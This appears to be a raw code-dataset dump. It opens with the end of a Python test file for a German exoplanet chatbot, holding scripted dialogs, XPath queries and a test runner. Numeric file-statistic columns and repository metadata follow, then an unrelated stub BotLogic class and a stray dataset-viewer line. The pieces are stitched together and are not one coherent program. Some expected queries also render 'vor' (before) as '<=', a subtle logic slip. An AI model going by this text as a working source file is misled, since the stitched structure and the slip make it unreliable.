Ich habe die folgenden 2 Planeten gefunden für die Anfrage 'Zeig mir 2 Planeten mit einem Radius von weniger als 0.05:'
Kepler-102 b, KOI-115.03
Möchtest du mehr über einen dieser Planeten erfahren?
"""
),
("nein", "Möchtest du eine neue Suche starten?"),
("nein","OK bye!")
],
[("hi", "Bitte gib deine Anfrage ein."),
("Zeig mir 3 Planeten mit einem Radius von mindestens 1 und einer Masse von maximal 5, die vor 2020 entdeckt wurden.","""
Normalized NL Query: #num0 planeten mit einem radius von mindestens #num1 und einer masse von maximal #num2 die vor #num3 entdeckt wurden
XML Queries:['(.//planet[radius>=1 and mass<=5 and discoveryyear<=2020])[position()<=3]']
Ich habe die folgenden 3 Planeten gefunden für die Anfrage 'Zeig mir 3 Planeten mit einem Radius von mindestens 1 und einer Masse von maximal 5, die vor 2020 entdeckt wurden.:'
51 Eri b, CoRoT-11 b, CoRoT-12 b
Möchtest du mehr über einen dieser Planeten erfahren?
"""
),
("nein", "Möchtest du eine neue Suche starten?"),
("nein","OK bye!")
],
[("hi", "Bitte gib deine Anfrage ein."),
("Zeig mir 1 Planeten mit einem Alter von weniger als 0.1 und einer Masse von mehr als 1, der in 2020 entdeckt wurde, und 3 Planeten, die einen Radius von mindestens 1 haben.","""
Normalized NL Query: #num0 planeten mit einem alter von weniger als #num1 und einer masse von mehr als #num2 der in #num3 entdeckt wurde und #num4 planeten die einen radius von mindestens #num5 haben
XML Queries:['(.//planet[age<=0.1 and mass>=1 and discoveryyear=2020])[position()<=1]', '(.//planet[radius>=1])[position()<=3]']
Ich habe keine Planeten für Teil 1 der Anfrage 'Zeig mir 1 Planeten mit einem Alter von weniger als 0.1 und einer Masse von mehr als 1, der in 2020 entdeckt wurde, und 3 Planeten, die einen Radius von mindestens 1 haben.' gefunden.
Hier sind 3 Planeten, die ich für Teil 2 der Anfrage 'Zeig mir 1 Planeten mit einem Alter von weniger als 0.1 und einer Masse von mehr als 1, der in 2020 entdeckt wurde, und 3 Planeten, die einen Radius von mindestens 1 haben.' gefunden habe:
1RXS1609 b, 2M 2206-20 b, 2MASS J0219-3925 B
Möchtest du mehr über einen dieser Planeten erfahren?
"""
),
("nein", "Möchtest du eine neue Suche starten?"),
("nein","OK bye!")
],
[("hi", "Bitte gib deine Anfrage ein."),
("Welche Planeten haben eine Masse von 1 und welche Planeten wurden vor 2001 entdeckt und welche Planeten haben eine Masse von 1 und wurden vor 2001 entdeckt?","""
Normalized NL Query: welche planeten haben eine masse von #num0 und welche planeten wurden vor #num1 entdeckt und welche planeten haben eine masse von #num2 und wurden vor #num3 entdeckt
XML Queries:['.//planet[mass=1]', './/planet[discoveryyear<=2001]', './/planet[mass=1 and discoveryyear<=2001]']
Hier sind 6 Planeten, die ich für Teil 1 der Anfrage 'Welche Planeten haben eine Masse von 1 und welche Planeten wurden vor 2001 entdeckt und welche Planeten haben eine Masse von 1 und wurden vor 2001 entdeckt?' gefunden habe:
HD 219415 b, HD 75784 b, Kepler-44 b, Jupiter, WASP-129 b, WASP-190 b
Hier sind 66 Planeten, die ich für Teil 2 der Anfrage 'Welche Planeten haben eine Masse von 1 und welche Planeten wurden vor 2001 entdeckt und welche Planeten haben eine Masse von 1 und wurden vor 2001 entdeckt?' gefunden habe:
16 Cygni B b, 47 UMa b, 47 UMa c, 51 Peg b, 55 Cancri b, 70 Vir b, BD-10 3166 b, eps Eridani b, Gliese 3021 A b, Gliese 86 b, Gliese 876 b, Gliese 876 c, HD 10697 b, HD 114762 b, HD 114783 b, HD 12661 b, HD 130322 b, HD 134987 b, HD 142 A b, HD 16141 A b, HD 168443 b, HD 168443 c, HD 169830 b, HD 177830 A b, HD 178911 B b, HD 179949 b, HD 187123 b, HD 192263 b, HD 195019 A b, HD 19994 A b, HD 209458 b, HD 210277 b, HD 213240 A b, HD 217107 b, HD 222582 A b, HD 23079 b, HD 27442 A b, HD 28185 b, HD 37124 b, HD 38529 A b, HD 39091 b, HD 4203 b, HD 4208 b, HD 46375 A b, HD 52265 b, HD 6434 b, HD 68988 b, HD 75289 A b, HD 80606 b, HD 89744 A b, HD 92788 b, HR 810 b, ITG 15B, mu Arae b, PSR 1257+12 A, PSR 1257+12 B, PSR 1257+12 C, PSR B1620-26 b, Rho Coronae Borealis b, Uranus, Neptune, Pluto, tau Boo A b, Upsilon Andromedae A b, Upsilon Andromedae A c, Upsilon Andromedae A d
Ich habe keine Planeten für Teil 3 der Anfrage 'Welche Planeten haben eine Masse von 1 und welche Planeten wurden vor 2001 entdeckt und welche Planeten haben eine Masse von 1 und wurden vor 2001 entdeckt?' gefunden.
Möchtest du mehr über einen dieser Planeten erfahren?
"""
),
("nein", "Möchtest du eine neue Suche starten?"),
("nein","OK bye!")
],
]
def run_test():
    """Replay every scripted dialog in ``test_set`` against the bot.

    Each dialog is a sequence of (user_input, expected_response) pairs.
    The conversation context dict returned by ``turn_handler`` is threaded
    from one turn into the next; ``turn_handler`` itself checks the actual
    response against ``true_out_response``.
    """
    ctx = {}
    for i, dialog in enumerate(test_set):
        # Visual separator so individual test dialogs are easy to spot in the log.
        print(f'\n\n\n######################## TEST {i} ########################\n\n')
        for request, expected in dialog:
            _, ctx = run_interactive.turn_handler(
                request, ctx, actor, true_out_response=expected
            )
    print("test passed")


if __name__ == "__main__":
    run_test()
| 52.540816
| 883
| 0.69664
| 2,749
| 15,447
| 3.905056
| 0.114587
| 0.021239
| 0.008943
| 0.016395
| 0.908803
| 0.892222
| 0.858034
| 0.828878
| 0.8
| 0.763577
| 0
| 0.105213
| 0.189033
| 15,447
| 294
| 884
| 52.540816
| 0.751736
| 0.000453
| 0
| 0.661202
| 0
| 0.229508
| 0.881737
| 0.070582
| 0
| 0
| 0
| 0
| 0
| 1
| 0.005464
| false
| 0.005464
| 0.016393
| 0
| 0.021858
| 0.010929
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
fa1a7c8e30744bbd7a4fe700ccb5da5c59470a79
| 208
|
py
|
Python
|
src/Task 2 - API/BotLogic.py
|
Darker97/Virtual-Shop
|
7682feb8257856f2c2960bfb5773a8603432c8c6
|
[
"MIT"
] | null | null | null |
src/Task 2 - API/BotLogic.py
|
Darker97/Virtual-Shop
|
7682feb8257856f2c2960bfb5773a8603432c8c6
|
[
"MIT"
] | 1
|
2020-01-14T14:08:55.000Z
|
2020-01-14T14:08:55.000Z
|
src/Task 2 - API/BotLogic.py
|
Darker97/Virtual-Shop
|
7682feb8257856f2c2960bfb5773a8603432c8c6
|
[
"MIT"
] | 1
|
2022-02-27T15:13:59.000Z
|
2022-02-27T15:13:59.000Z
|
class BotLogic:
    """Stub lifecycle hooks for a bot session; both methods only print."""

    # NOTE(review): neither method declares `self`, so they only behave as
    # intended when called on the class (e.g. BotLogic.BotExit(msg)); if
    # called on an instance, `Nachricht` receives the instance — confirm
    # how callers invoke these before changing the signatures.
    def BotExit(Nachricht):
        """Placeholder for signing off from the bot (currently print-only)."""
        print("Say Goodbye to the Bot")
        # Sign off from the bot (translated from: "Beim Bot abmelden")
    def BotStart(Nachricht):
        """Placeholder for signing on to the bot (currently print-only)."""
        print("Say Hello to the Bot")
        # Sign on to the bot (translated from: "Beim Bot anmelden")
| 23.111111
| 39
| 0.605769
| 26
| 208
| 4.846154
| 0.615385
| 0.222222
| 0.269841
| 0.190476
| 0.238095
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.3125
| 208
| 9
| 40
| 23.111111
| 0.881119
| 0.168269
| 0
| 0
| 0
| 0
| 0.247059
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.4
| false
| 0
| 0
| 0
| 0.6
| 0.4
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
|
0
| 7
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.